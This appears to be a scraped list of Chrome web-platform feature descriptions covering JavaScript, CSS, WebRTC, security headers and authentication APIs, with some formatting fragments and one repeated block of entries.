The existing syntactic forms for importing modules are static declarations. However, it’s also desirable to be able to dynamically load parts of a JavaScript application at runtime.
<style>
)Make /deep/ behave like the descendant combinator " " in CSS live profile; effectively no-op.
See “Intent to Remove” thread for more details: https://groups.google.com/a/chromium.org/d/topic/blink-dev/HX5Y8Ykr5Ns/discussion
https://www.w3.org/TR/selectors-4/#profiles
CSS live profile = CSS selector used in CSS file or inside of <style>
.
CSS snapshot profile = CSS selector used in JS, such as querySelector(…)
applyConstraints() allows changing the constraints associated with a MediaStreamTrack.
This is useful to change settings such as video resolution or frame rate.
applyConstraints() was previously released with support for ImageCapture (https://w3c.github.io/mediacapture-image/).
This feature includes adding support for the main spec (https://w3c.github.io/mediacapture-main/).
A mechanism for speculative prefetching of webpages and their subresources that are on a critical path of page loading without executing any JavaScript or creating a complex state of the web platform. This system is not purely “no state” because HTTP cache allows to create cookies and other state related to validating cache entries.
It is important to note that the “NoState Prefetch” is not an API.
Server side detection: https://bugs.chromium.org/p/chromium/issues/detail?id=796855
This finally method is used for registering a callback to be invoked when a promise is settled (either fulfilled, or rejected).
Blink used to add an anonymous named property getter to the Storage interface (used by sessionStorage and localStorage) that behaved slightly differently from the getItem() method. The anonymous getter has been removed, and getItem() is now used behind the scenes instead. One visible consequence is that attempting to access a key that does not exist via the getter will return null instead of undefined.
The methods belonging to the Storage IDL interface (available via sessionStorage and localStorage), such as getItem(), clear() and removeItem() are now enumerable as mandated by the HTML spec.
They are not returned by Object.keys(), but do appear in e.g. for-in loops.
‘beforeprint’ event is dispatched before starting printing, and ‘afterprint’ event is dispatched after finishing printing. They are useful to build printing-only content, and clean it up.
Support the minimal-ui display mode as defined in the Web App Manifest.
This property will result in Chrome displaying a “Chrome Custom Tab”-like UI.
The Webdriver specification defines a navigator.webdriver
property to indicate if UA is controlled by automation. This property is defined and returns true
when running Chrome with the --headless
flag.
The /deep/ combinator was a part of Shadow DOM v0, which has been deprecated and removed. Starting in M63, the /deep/ combinator was treated as a no-op, equivalent to a space " " combinator. As the code for all of Shadow DOM v0 was removed completely in M89, /deep/ will now throw exceptions in some JS operations, such as querySelectorAll. Simply replace it with " " to get pre-M89 behavior back.
Only for macOS.
The default stylesheet for <button>
, <input type=button>
, <input type=reset>
, <input type=submit>
, a button in <input type=file>
was changed in order to match OS-native buttons.
Background-color, border, border-radius, and padding were changed.
This is an API for querying the user agent about a device’s encoding capabilities for the purpose of recording or transmitting.
The saveData attribute is a boolean that indicates a client’s explicit opt-in for reduced data usage, due to high transfer costs, slow connection speeds, or other reasons. It’s use allows JavaScript to make decisions that result in reduced data use, such as to load smaller images and video resources, or reduce buffering or predictive actions.
This is expected to be enabled by default in Chrome 65.
Authors using CSS Motion Path can now animate the path that an element moves along by animating the offset-path property
The transform-box property allows defining which reference box to use when computing ‘transform’ and ‘transform-origin’. It currently only has an effect on SVG elements.
CSS Text Decoration 4: property controls how overlines and underlines are drawn when they cross over a glyph.
With the initial, default value “auto” decoration lines skip over where glyphs are drawn: interrupt the decoration line to let the shape of the text show through where the text decoration would otherwise cross over a glyph. The UA must also skip a small distance to either side of the glyph outline.
To disable this behavior, use text-decoration-skip-ink: none
Make EventTarget constructor callable, allowing them to be constructed on their own or be subclassed.
chrome.loadTimes() is a non-standardized API that enables collecting loading related metrics to understand performance in the real world. However the metrics there are now available as standardized APIs, so this API will be deprecated and removed.
It’s proposed that by default the following permissions cannot be requested or granted to content contained in cross-origin iframes:
Geolocation
Midi
Encrypted media extensions
Microphone and Camera
In order for a cross-origin frame to get access to these permissions, the embedding page must specify a Feature Policy which enables the feature for the frame. For example, to enable geolocation in an iframe, the embedder could specify the iframe tag as:
<iframe src="..." allow="geolocation">
Allows developers to selectively enable and disable use of autoplay through the feature policy HTTP header or the <iframe>
“allow” attribute.
By default we will allow autoplay on same origin iframes. If developers have cross origin iframes they will be able to enable autoplay on those frames by enabling the “autoplay” feature.
A property which represents the cache mode of a Request. This feature includes RequestInit.cache which sets the property.
Make the coordinates in PointerEvents of pointerType=mouse fractional, in order to include the full precision provided by the underlying platform.
This change allows web developers to request to decode an img element. The call to a new HTML <img>
element’s decode() function returns a promise, which, when fulfilled, ensures that the image can be appended to the DOM without causing a decoding delay on the next frame.
This feature allows developers to specify decoding attribute on HTMLImageElement and SVGImageElement which would have one of two states:
“async”: This indicates that the developer prefers responsiveness and performance over atomic presentation of image and non-image content.
“sync”: This indicates that the developer prefers atomic presentation of content over responsiveness.
“auto”: This indicates a default state where the user-agent can select the behavior.
Intl.NumberFormat.prototype.formatToParts() is scheduled to be added to the ECMAScript Internationalization API specification (Ecma 402). It adds a method to format a number to a list of tokens and their types (e.g. minusSign, integer, decimal, fraction, currency, percentSign, etc).
See also the corresponding DateTimeFormat feature here: https://www.chromestatus.com/feature/6319456309477376
Set the default preload value for video and audio elements to “metadata”.
Note that the preload attribute’s hint is still ignored when a MediaSource is attached to the media element.
Most platforms ship with a notification center of their own - on mobile devices this may be more prominent than on desktops, but they do exist. We’re in progress of moving notifications shown by Chrome to be included in those centers as well.
Other browsers already use native notification centers where available.
Change <input type="file">
filename encoding in multipart/form-data uploads in forms with non-Unicode accept-charset to use HTML numeric character references rather than ‘?’ when a filename the user selects contains characters not representable in the target character encoding.
This change would align our behavior with the existing behavior of Firefox and Edge. It is hoped that this behavior can eventually achieve cross-browser consensus and standardization.
Adds an optional argument to existing focus APIs that disable the scroll triggered by focus.
This feature tracks RTCPeerConnection methods getSenders(), addTrack(), removeTrack() and the essentials of interface RTCRtpSender.
Named captures for ECMAScript regular expressions allow developers to create and refer to named capture groups.
The contex is: https://github.com/whatwg/dom/issues/334
We are trying to standardize certain Microsoft event extensions. One of them is window.event. Blink supports window.event.
In the discussion, we agreed that window.event should be undefined if an Event’s target is in a shadow tree.
That is effectivery equivalent to removing window.event for Shadow DOM.
The Resize Observer API can be used to observe changes to size of Element’s content rect.
On sites with very abusive experiences (see documentation link below), Chrome will start enforcing a more aggressive popup blocker. This will invoke Chrome’s popup blocking UI for new windows or tabs regardless of whether there is a user gesture.
Throw a NotSupportedError DOM exception when a media element’s playbackRate is set to an unsupported value.
The Unicode Standard assigns various properties and property values to every symbol. For example, to get the set of symbols that are used exclusively in the Greek script, search the Unicode database for symbols whose Script property is set to Greek.
Unicode property escapes are a new type of escape sequence available in regular expressions that have the u
flag set. They enable querying the Unicode database for certain properties and values.
E.g. /\p{Script=Greek}/u.test('π') === true
The X-Content-Type-Options: nosniff
header allows a server to assert that its resources may only be executed as script or applied as style if they’re delivered with appropriate Content-Type
headers.
The import.meta
meta-property provides a host-defined object which exposes context-specific metadata to a JavaScript module (e.g. the enclosing module’s URL or associated <script>
element).
An event handler to tell a site that it has been installed or added to home screen.
Enable elements to host more than one Shadow Roots.
Dropping this feature from the spec is the resolution at Web Components f2f meeting (https://www.w3.org/wiki/Webapps/WebComponentsApril2015Meeting) This was deprecated in Chrome 45. Removal is anticipated in Chrome 64.
This was deprecated in Chrome 45.
getMatchedCSSRules is a webkit-only API to get a list of all the style rules applied to a particular element.
It has been deprecated since 2014.
If a document in a background tab calls window.alert() then the call to alert() will return immediately; the dialog will be shown to the user when they switch to the tab. A UI indicator will be set so the user is aware of the pending alert dialog. This removes the ability to use window.alert() to bring a tab to the front against the user’s will.
Stop showing ads (including ads owned or served by Google) on sites that do not comply with the betterads.org/standards
Feature Intro:
https://blog.chromium.org/2017/06/improving-advertising-on-web.html
How Chrome’s ad filter works
https://blog.chromium.org/2018/02/how-chromes-ad-filtering-works.html
Filtering began on sites globally in July 2019.
https://blog.chromium.org/2019/01/building-better-world-wide-web.html
Ad Experience Report Info
https://support.google.com/webtools/answer/7159932
prefetch-src
directive.CSP allows developers to control the set of resources which can be preloaded by specifying a prefetch-src
directive. The directive has the same format as other fetch directives; developers write an allowlist which defines the set of hosts from which resources can be preloaded. If prefetch-src
is not specified, default-src
will apply.
<a download>
To avoid what is essentially user-mediated cross-origin information leakage, Blink will start to ignore the presence of the download attribute on anchor elements with cross origin attributes.
Update parsing of HSL() and HSLA() to the syntax described in CSS Color 4. The functions were synonymized, along with allowing whitespace to separate the parameters instead of commas, introducing a backslash as a new way to separate the alpha parameter, allowing angles to be specified as the hue, and allowing percent values for the alpha parameter.
Update parsing of RGB() and RGBA() to the syntax described in CSS Color 4. The functions were synonymized, along with allowing whitespace to separate the channels instead of commas, introducing a backslash as a new way to separate the alpha parameter, and allowing percent values for the alpha parameter.
CSS Paint API defines a new callback which is designed to allow developers to write code which produces a CSS <image>
during the paint phase of the rendering engine.
The :any-link pseudo-class represents an element that acts as the source anchor of a hyperlink.
The original HTML/CSS specifications were unclear about the intended behavior for elements inside display:none iframes. [Do they get CSS boxes? Are they rendered?] This has led to a divergence in behavior between UAs. The specs are in the process of being clarified, and the new spec matches the behavior of Edge and Gecko [which do not perform box construction or layout]. Note that Chrome’s current behavior has negative performance implications.
https://github.com/whatwg/html/issues/1813
Allows developers to selectively enable and disable use of Synchronous XMLHttpRequest requests through the feature policy HTTP header or the <iframe>
“allow” attribute. The identifier for the feature in policies is “sync-xhr”. By default, synchronous XHR is allowed in all frames. If developers wish to disable this on any page, they can include a header like:
Feature-Policy: sync-xhr ‘none’
Or embed content in an frame with sync XHR disabled like:
<iframe src="..." allow="sync-xhr 'none'">
Add support for initializing keyCode, charCode via KeyboardEventInit.
Support NTLMv2 authentication. Currently on non-Windows platforms only NTLMv1 is used.
The takeRecords method returns a copy of the performance entries in the PerformanceObserver’s buffer, and also clears this buffer. This aligns PerformanceObserver with other *Observer implementations, like MutationObserver and IntersectionObservers, which have similar methods.
This feature encapsulates the addition of the following methods to RTCPeerConnection:
getSenders(),
getReceivers(),
addTrack(MediaStreamTrack track, MediaStream… streams),
and removeTrack(RTCRtpSender sender).
The RTCRtpSender and RTCRtpReceiver objects will initially be limited to supporting the “track” attribute, with RTCRtpSender also supporting “replaceTrack(MediaStreamTrack withTrack)”.
This allows you to seamlessly change which track is being sent without having to renegotiate at the expense of another offer/answer cycle.
For example, you might want to switch which video to send or to temporarily not send video, without any disruption in audio or at the cost of an RTT delay. It can also be used to control whether or not to send with replaceTrack(null).
The Request.destination
getter enables Service Worker code knowledge regarding which type of resource it is fetching.
Add the PerformanceServerTiming Interface which makes Server-Timing header timing values available to JavaScript running in the browser.
The HTMLAnchorElement.relList read-only property reflects the rel attribute. It is a live DOMTokenList containing the set of link types indicating the relationship between the resource represented by the <a>
element and the current document.
The HTMLAreaElement.relList read-only property reflects the rel attribute. It is a live DOMTokenList containing the set of link types indicating the relationship between the resource represented by the <area>
element and the current document.
The latest version of the Transport Layer Security (TLS) protocol. For M65, draft-23 of the protocol will be rolled out to Chrome users via a field trial.
Latch to a single element for the duration of a wheel scroll. Only the first wheel event in a scrolling sequence is cancel-able.
Worklets define a new javascript execution context which is designed to allow developers to write code which is intended to be run synchronously within the rendering engine, however independent of the main user javascript.
This feature was released in two stages. Worklets for paint were released in Chrome 65/Opera 52. Worklets for audio were released for Chrome 66/Opera 53.
<slot>
Add assignedElements on <slot>
, similar to assignedNodes(), but returning Element nodes only. The method returns elements that are assigned to a given slot.
“display: contents” allows you to control the box generation of an element.
The element with “display: contents” won’t generate any box, but its children and pseudo-elements will still do it as normal.
It’s like the element has been replaced by its children and pseudo-elements.
It has been possible for web developers to overwrite document.all for a long time, but according to the web standard, document.all will be no longer overwritable, i.e. it will be readonly.
[before the change]
document.all = 42;
console.log(document.all);
// prints 42
[after the change]
document.all = 42;
console.log(document.all);
// prints a HTMLAllCollection
Ever since serializer was deprecated in favor of toJSON 1, the Performance and PerformanceEntry specs added a mandatory toJSON method. This method should just call the default toJSON operation [2].
1 https://github.com/w3c/resource-timing/issues/112
[2] https://heycam.github.io/webidl/#default-tojson-operation
The following interfaces will have toJSON added:
PerformanceResourceTiming
PerformanceLongTaskTiming
TaskAttributionTiming
<meta http-equiv="set-cookie" ...>
<meta http-equiv="set-cookie" ...>
provides a mechanism for manipulating a host’s cookies via markup. Ideally, we would require access to a host’s HTTP headers, or script-execution capabilities to modify this data.
To support sharing of MHTML pages, a new header Snapshot-Content-Location will be added. The existing Subject header will be updated to support encoding of non-printable ASCII characters.
<textarea>
and <select>
Add autocomplete attribute to <textarea>
and <select>
as per spec.
https://html.spec.whatwg.org/multipage/form-elements.html#the-select-element, https://html.spec.whatwg.org/multipage/form-elements.html#the-textarea-element
Chrome has never supported the FIDO U2F API directly1. However, it does ship with an internal extension and it’s possible to implement the U2F API by using postMessage to send messages to this extension.
(Description continued in comments.)
1 https://fidoalliance.org/specs/fido-u2f-v1.2-ps-20170411/fido-u2f-javascript-api-v1.2-ps-20170411.html
The values() method returns a new Array Iterator object that contains the values for each index in the array.var
A modern, asynchronous Clipboard API based on Promises.
Text-only APIs (clipboard.readText and clipboard.writeText):
Support for images and other data types is still under development.
<form>
elementsImprove compatibility with Safari’s implementation of autocapitalize by:
Supporting autocapitalize attribute on any contenteditable element
Allow specifying the autocapitalize attribute on a <form>
element to have it apply to all child form fields
The new CSSOM provides typed style access for developers. This will generally improve performance primarily by removing the need to do lots of string parsing. In addition to this, it will enable performant development of various new Houdini specifications (including custom properties, layout and paint).
Only a subset of CSS properties are supported for now:
https://chromium.googlesource.com/chromium/src/+/master/third_party/WebKit/Source/core/css/cssom/README.md
According to the CSS Values 4 spec, math functions such as calc() should be allowed wherever individual CSS values such as numbers are allowed. However, calc() expressions are not currently parsed in media queries. This change would introduce support for parsing calc() expressions inside of media queries.
By spec, the following should not throw even if additive/accumulative animations are not yet supported by the browser:
// Currently throws on Chrome - should not!
element.animate(
[
{ color: ‘red’, composite: ‘accumulate’ },
{ color: ‘blue’, composite: ‘add’ }
], 2000);
);
Firefox does not throw in this case.
A Stage 3 proposal makes ECMAScript a syntactic superset of JSON by allowing line separator (U+2028) and paragraph separator (U+2029) in string literals.
The sensor policy-controlled features are used to control access to a device sensors requested through an event specified in the DeviceOrientation Event Specification. By default, the deviceorientation, deviceorientationabsolute and devicemotion events will be restricted to top-level document and same-origin subframes (it follows from features default allow list ‘self’). The default behavior can be modified by explicitly enabling or disabling of the dedicated sensor policy-controlled features.
A fetch() can be made cancellable by passing an AbortSignal “signal” in the fetch options. Calling abort() on the associated AbortController will then cancel the fetch.
This option instructs fetch() to perform resource fetching with the keepalive flag set for non-blocking event reporting, analytics, etc. as well as the Beacon API (SendBeacon).
The “implementation-dependent String” returned from Function.prototype.toString() is now a fully-specified String, which is a substring of the source code that defines the function. For example, this preserves whitespace and comments between the “function” keyword and the function name identifier.
For functions created with CreateDynamicFunction (such as through new Function()
), the String is fully-specified and includes the parameters passed to CreateDynamicFunction.
The new “modulepreload” rel value in <link>
element and Link: header provides a way to initiate early (and high-priority) loading of module scripts.
<tr>
with transform be a containing block.Elements with table-row, table-row-group, table-header-group, table-footer-group, table-cell, and table-caption that have a transform property should be containing blocks for fixed position elements. Blink currently does not make <tr>
, <tbody>
, <tfoot>
, and <thead>
be a containing block for fixed position elements, which we propose to change.
This specification intends to provide APIs to allow websites to make an optimal decision when picking media content for the user. This launch is only about exposing the decoding abilities of the device/system/browser.
Returns the capabilities of the source associated to a MediaStreamTrack.
There is also a variant InputDeviceInfo.getCapabilities(), available in the results of MediaDevices.enumerateDevices().
These devices are used as sources for MediaStreamTrack; in this case, getCapabilities() returns the same values as MediaStreamTrack.getCapabilities().
Rather than returning a 404 when attempting to read from a invalid/non-existing Blob URL, these fetches should result in a network error.
This proposal allows the catch
clause to exist without a parameter.
This attribute allows access to the DTMF feature of a PeerConnection’s audio track.
It is a replacement for the now non-standard CreateDTMFSender function on a PeerConnection.
Previously elementFromPoint and elementsFromPoint are not per spec, and it may return null incorrectly because it is not retargeting the result correctly. We are fixing it to adhere to the spec by applying the correct retargeting algorithm.
As per spec, on input activation behavior fires a input event, then a change event for radio and file <input >
type.
As per spec, click on mutable checkbox fires a click event, then an input event, then a change event.
With this change, a service worker can no longer respond to a request whose mode is ‘same-origin’ with a response whose type is ‘cors’. This is a security measure added to the Fetch specification via https://github.com/whatwg/fetch/issues/629 and https://github.com/whatwg/fetch/pull/655.
With this change FetchEvent#clientId will return an empty string instead of null when it isn’t set, e.g., for a navigation request.
Service workers no longer receive fetch events for requests from embed and object elements. This includes both requests for the main resource itself (the src or data attribute) and for any requests from the resulting context (the plugin or HTML context). This change was made to adhere to the specification, which disallows service worker interception due to security considerations.
Until now, String.prototype.{trimLeft,trimRight} were non-standard language extensions, required for Web compatibility.
The Stage 3 proposal at https://github.com/tc39/proposal-string-left-right-trim standardizes this functionality as String.prototype.{trimStart,trimEnd}, and defines String.prototype.{trimLeft,trimRight} as aliases for backwards compatibility.
This patch implements that proposal behind the --harmony-string-trimming flag.
<canvas>
A new rendering context that streamlines the display of ImageBitmap objects. This new rendering context uses transfer semantics to take ownership of the pixels of an ImageBitmap object, thus avoiding memory duplication and rasterization overhead.
Rename gutter properties to remove “grid-” prefix:
Note that column-gap already exists and is used by css-multicol.
The parsing needs to be updated as now the default value is “normal”.
The old (prefixed) properties names will be kept working as aliases.
When setting the value of an AudioParam via the value setter, the value is updated exactly as if setValueAtTime(newValue, context.currentTime).
This includes throwing errors that weren’t previously thrown and changing the AudioParam timeline
Historically, Chrome implemented dezippering such that when the value setter of an AudioParam was used, the value was not changed instantaneously. Instead, an exponential approach equivalent to setTargetValueAtTime was done. The actual time constant used was never specified and depended on the AudioParam.
With the spec change in https://github.com/WebAudio/web-audio-api/pull/393, (Sep 2015), all dezippering was removed from the spec.
Dezippering will be removed from Chrome.
[WebAudio]
AudioWorkletThe AudioWorklet allows developers to supply JavaScript to process audio on the audio rendering thread. This processing mechanism ensures the synchronous execution of the author code with other built-in AudioNodes in the audio graph.
The AudioWorklet is designed to replace ScriptProcessorNode. ScriptProcessorNode will be deprecated once AudioWorklet is shipped.
The inputmode content attribute is an enumerated attribute that specifies what kind of input mechanism would be most helpful for users entering content into the form control or content editable.
If a page in fullscreen mode opens a popup and calls window.focus(), that page will exit full screen. This will not occur if the popup receives focus some other way.
<foreignObject>
will be a stacking contextSVG2 specifies that <foreignObject>
to be a stacking context (*). Previously,
Chrome did not follow the SVG2 spec. Making <foreignObject>
a stacking context allows developers to place HTML content underneath a <foreignObject>
without confusion. For example, it wouldn’t make much sense to place content at z-index:1 above the containing SVG.
Gecko and Edge already implement this behavior.
(*) https://svgwg.org/svg2-draft/single-page.html#render-EstablishingStackingContex
JavaScript gets a new numeric primitive that provides support for arbitrary-precision integers. Number
s in JavaScript are represented as double-precision floats, giving them limited precision. BigInt
s, on the other hand, can safely store and operate on large integers even beyond the safe integer limit for Number
s.
The DOM specification was updated so that DOMTokenList replace() returns a boolean value. This is useful for code which takes different paths depending on whether a replacement occurred, avoiding the need for an extra condition using contains().
Cross-Origin Read Blocking (CORB) is an algorithm that can identify and block dubious cross-origin resource loads in web browsers before they reach the web page. CORB reduces the risk of leaking sensitive data by keeping it further from cross-origin web pages. In most browsers, it keeps such data out of untrusted script execution contexts. In browsers with Site Isolation, it can keep such data out of untrusted renderer processes entirely, helping even against side channel attacks like Spectre.
Authors can now create custom elements which inherit from the semantics of native, built-in elements. This is helpful when web authors want to add features to their custom elements, but they cannot be implemented in CSS or JavaScript though the features are available in built-in elements.
In Windows the right-hand Alt key serves as AltGraph (ISO-Level-3-Shift) on some layouts (for example, many European language layouts), to allow generating additional printable characters. Internally the key generates Ctrl+Alt modifiers, so that Chrome reports all of Control, Alt and AltGraph in the flags for these keys. In this change, Chrome distinguishes AltGraph from Ctrl+Alt under Windows for consistency with modifiers on other platforms.
See the comments for how this helps developers.
Motion sensors extends the Generic Sensor API to expose a set of low-level and fusion sensors. This feature includes JS interfaces representing accelerometers, linear acceleration sensors, gyroscopes, absolute orientation sensors and relative orientation sensors.
New WebRTC implementations provided a filtered view of the statistics returned by getStats() in RTCRtpSender, RTCRtpReceiver, and RTCPeerConnection, returning only stats that are relevant to the sender, receiver, or track. This change adds convenience for developers by requiring less code for filtering. Because this is based on the spec it increases cross-browser compatibility.
Web pages can now process mouse events (mousedown, auxclick, mouseup) for back and forward buttons on mice with five or more buttons. This allows back and forward mouse buttons to be prevented by applications that wish to override them. For example they may be useful for games.
The <slot>
element can now participate in a flat (layout) tree, with UA style: display: contents. Before this change, applying a CSS selector to a <slot>
element had no effect. Not only is this fixed, when selectors are applied to a <slot>
element, it’s children inherit its styles.
TransformStream is part of the Streams API for creating, composing, and consuming streams of data. It enables transforming data in stream form. It is typically used in a pipe between a ReadableStream and a WritableStream.
The Credential Management API (Chrome 51 and later) defined a framework for retrieving credentials, including semantics for creating, getting, and storing them. It did this through two credential types: PasswordCredential and FederatedCredential. The Web Authentication API adds a third credential type, PublicKeyCredential, which allows web applications to create and use strong, cryptographically attested, and application-scoped credentials to strongly authenticate users.
-webkit-box-flex-group - This property has virtually zero usage based on the UseCounter on stable.
% values of -webkit-line-clamp - There is interest in finding a standards based solution to the number values usecase, but we haven’t seen demand for the %-based values.
-webkit-box-lines - This property was never fully implemented. It was originally intended such that a “vertical”/”horizontal” -webkit-box can have multiple rows/columns.
The shape-outside property allows web developers to wrap text around a float with a non-rectangular area. In our implementation this also currently affects how new formatting contexts are sized and positioned.
We want to change how they are sized and positioned, similar to how floats are positioned (based off the bounding area instead).
<foreignObject>
will be a stacking contextSVG2 specifies that <foreignObject>
to be a stacking context (*). Previously,
Chrome did not follow the SVG2 spec. Making <foreignObject>
a stacking context allows developers to place HTML content underneath a <foreignObject>
without confusion. For example, it wouldn’t make much sense to place content at z-index:1 above the containing SVG.
Gecko and Edge already implement this behavior.
(*) https://svgwg.org/svg2-draft/single-page.html#render-EstablishingStackingContex
JavaScript gets a new numeric primitive that provides support for arbitrary-precision integers. Number
s in JavaScript are represented as double-precision floats, giving them limited precision. BigInt
s, on the other hand, can safely store and operate on large integers even beyond the safe integer limit for Number
s.
The DOM specification was updated so that DOMTokenList replace() returns a boolean value. This is useful for code which takes different paths depending on whether a replacement occurred, avoiding the need for an extra condition using contains().
Cross-Origin Read Blocking (CORB) is an algorithm that can identify and block dubious cross-origin resource loads in web browsers before they reach the web page. CORB reduces the risk of leaking sensitive data by keeping it further from cross-origin web pages. In most browsers, it keeps such data out of untrusted script execution contexts. In browsers with Site Isolation, it can keep such data out of untrusted renderer processes entirely, helping even against side channel attacks like Spectre.
Authors can now create custom elements which inherit from the semantics of native, built-in elements. This is helpful when web authors want to add features to their custom elements, but they cannot be implemented in CSS or JavaScript though the features are available in built-in elements.
In Windows the right-hand Alt key serves as AltGraph (ISO-Level-3-Shift) on some layouts (for example, many European language layouts), to allow generating additional printable characters. Internally the key generates Ctrl+Alt modifiers, so that Chrome reports all of Control, Alt and AltGraph in the flags for these keys. In this change, Chrome distinguishes AltGraph from Ctrl+Alt under Windows for consistency with modifiers on other platforms.
See the comments for how this helps developers.
Motion sensors extends the Generic Sensor API to expose a set of low-level and fusion sensors. This feature includes JS interfaces representing accelerometers, linear acceleration sensors, gyroscopes, absolute orientation sensors and relative orientation sensors.
New WebRTC implementations provided a filtered view of the statistics returned by getStats() in RTCRtpSender, RTCRtpReceiver, and RTCPeerConnection, returning only stats that are relevant to the sender, receiver, or track. This change adds convenience for developers by requiring less code for filtering. Because this is based on the spec it increases cross-browser compatibility.
Web pages can now process mouse events (mousedown, auxclick, mouseup) for back and forward buttons on mice with five or more buttons. This allows back and forward mouse buttons to be prevented by applications that wish to override them. For example they may be useful for games.
The <slot>
element can now participate in a flat (layout) tree, with UA style: display: contents. Before this change, applying a CSS selector to a <slot>
element had no effect. Not only is this fixed, when selectors are applied to a <slot>
element, it’s children inherit its styles.
TransformStream is part of the Streams API for creating, composing, and consuming streams of data. It enables transforming data in stream form. It is typically used in a pipe between a ReadableStream and a WritableStream.
The Credential Management API (Chrome 51 and later) defined a framework for retrieving credentials, including semantics for creating, getting, and storing them. It did this through two credential types: PasswordCredential and FederatedCredential. The Web Authentication API adds a third credential type, PublicKeyCredential, which allows web applications to create and use strong, cryptographically attested, and application-scoped credentials to strongly authenticate users.
-webkit-box-flex-group - This property has virtually zero usage based on the UseCounter on stable.
% values of -webkit-line-clamp - There is interest in finding a standards based solution to the number values usecase, but we haven’t seen demand for the %-based values.
-webkit-box-lines - This property was never fully implemented. It was originally intended such that a “vertical”/”horizontal” -webkit-box can have multiple rows/columns.
The shape-outside property allows web developers to wrap text around a float with a non-rectangular area. In our implementation this also currently affects how new formatting contexts are sized and positioned.
We want to change how they are sized and positioned, similar to how floats are positioned (based off the bounding area instead).
This change adds support for the RTCRtpParameters.headerExtensions dictionary entry which is returned by RTCRtpSender.getParameters(). This is a read-only field that allows inspection of the parameters that are set on a PeerConnection after negotiation.
JavaScript arrays are getting two new methods. Array.prototype.flat()
returns a new array with all sub-array elements concatenated into it recursively up to the specified depth. The sub-array elements become members of the new array. Array.prototype.flatMap()
first maps each element using a mapping function, then flattens the result into a new array. This method is functionally equivalent to a map followed by a flatten of depth 1.
For invisible frames e.g. ones in background tabs, Chrome set a per-frame simultaneous loading limit; 3 for the top frame, 2 for sub-frames are permitted to go to the network stack.
Excessive requests are enqueued and go when the previous request finishes. Thus, all requests will run eventually.
Most fetches made by HTML elements / CSS are throttleable.
WebSockets, WebRTC’s data channel, Fetch API, XMLHttpRequest, EventSource, Video and Audio are excluded today to allow keep-alive connections.
‘unsafe-hashes’ is a feature in CSP3 which allows developers to enable specific event handlers without needing to use the less safe ‘unsafe-inline’ keyword.
If ‘unsafe-hashes’ is present, inline event handlers are allowed to match against hashes specified by the ‘script-src’ directive (or its fallback if not present).
report-to
directiveThe report-to
directive wires CSP violation reports up to the Reporting API which allows the browser to bundle multiple reports when sending them to the server rather than creating a POST for each individual report. This allows reports to be collected in a way that is friendlier for users’ batteries. This change also deprecates the existing report-uri
directive.
The CSS scroll snap specification introduces snap points as a way to “enforce the scroll offsets that a scroll container’s visual viewport may end at after a scrolling operation has completed”. Scroll snapping applies to both user scroll operations such as touch, wheel scrolling, or scrollbar dragging, and programmatic scroll operations such as Element.scrollTo(). This improves the user experience by allowing scrollable zones to easily stop at predefined points.
Support was added for CSS conic (angular/sweep) gradients. Conic gradients allow color transitions around a center rather than radiating from it. This allows, for example, a web developer to create a hue wheel using only two CSS properties.
Chrome now implements logical margin, padding, and border CSS properties using standard names, specifically margin-{block,inline}-{start,end}, padding-{block,inline}-{start,end} and border-{block,inline}-{start,end}-{width,style,color}. These capabilities were previously supported through -webkit prefixes and non-standard names. Shorthand properties are only added for border-{block,inline}-{start,end}.
A new feature of the Reporting API gives developers more insight into the functioning of their code on client machines. Deprecation reports allow deprecation warnings, currently only available in developer tool consoles, to be sent to the back end, or captured in callbacks using ReportingObserver.
Display cutouts are now supported in Chrome through CSS environment variables and the viewport-fit meta tag. This allows developers to take advantage of the entire screen on devices that have a display cutout.
A new method named Element.toggleAttribute() allows toggling the existence of an element’s attribute in a way similar to Element.classList.toggle. An optional force parameter forces toggling the attribute even if it doesn’t exist. This makes managing boolean attributes much simpler as the interface doesn’t use strings as does Element.setAttribute().
Add a boolean property to request objects to indicate whether the particular request is a history navigation. This allows a service worker to know whether a request was due to a back/forward navigation. An example of how this might be used is that a service worker could respond to such a navigation with a cached response.
This API returns a map which translates from KeyboardEvent.code values into strings that can be shown to the user to identify each key.
This is not possible with existing web platform APIs because the value that should be shown to the user depends on the keyboard layouts that the user has installed and activated.
This allows workers to spawn additional, descendant dedicated workers.
This can be used to better distribute tasks without needing time on the main thread where rendering and user input are being handled. This also allows libraries which use workers to be adapted to run in a worker context themselves, giving developers more options to move business logic off of the main thread.
This feature defines a mechanism that enables developers to declare a network error reporting policy for a web application via the NEL
header. A user agent can use this policy to report encountered network errors that prevented it from successfully fetching requested resources. This is done through the common Reporting API.
OffscreenCanvas is a new interface that allows canvas rendering contexts (2D and WebGL) to be used in Workers. Making canvas rendering contexts available to workers increases parallelism in web applications, leading to improved performance on multi-core systems.
As part of the required tooling for this to work, this also launches DedicatedWorker.requestAnimationFrame(), allowing animation-like events to be triggered the same on dedicated workers as they are in Window.
The getCapabilities() method returns the most optimistic view of the capabilities of the system for sending media of the given kind. It does not reserve any resources, ports, or other state but is meant to provide a way to discover the types of capabilities of the browser including which codecs or RTP extensions may be supported.
The Reporting API defines a generic reporting framework which allows web developers to associate a set of named reporting endpoints with an origin. Various platform features (like Content Security Policy, Network Error Reporting, and others) will use these endpoints to deliver feature-specific reports in a consistent manner.
A new feature of the Reporting API gives developers more insight into the functioning of their code on client machines. The ReportingObserver API allows JavaScript to capture reports in callback, which can be used to save custom reporting data to page analytics.
ServiceWorkerRegistration.update() previously resolved with undefined. Now it resolves to the registration object as required by the specification.
External stylesheets in the body of the document or that get activated after the body has started to be parsed will no longer block paint but they will pause the parser. The end result is that any DOM content before the body stylesheet will continue to paint but content after the stylesheet will not appear until after the stylesheet has loaded.
This feature adds support for CTAP2 devices, which provide advanced security capabilities such as biometric authentication and resident keys (keys stored on the device). The WebAuthentication API (https://www.chromestatus.com/feature/5669923372138496) formerly only supported Universal 2nd Factor (U2F, also known as CTAP1 ) devices at the transport layer. This change doesn’t alter the API surface itself but enables richer device interactions via the existing Web Authentication API.
TLS 1.3 encrypts the server’s certificates. With that protection in place, we finally have the confidence that we can implement certificate compression without causing middlebox issues.
Certificate compression is an IETF TLS WG draft (https://tools.ietf.org/html/draft-ietf-tls-certificate-compression-03) and we plan on implementing that specification, supporting the Brotli algorithm.
Support for the “rtt”, “downlink”, and “ect” client hint values and HTTP request headers have been added to Chrome to convey Chrome’s network connection speed to servers. These network quality hints provide the same values as existing Network Information APIs navigator.connection.rtt, navigator.connection.downlink, and navigator.connection.effectiveType.
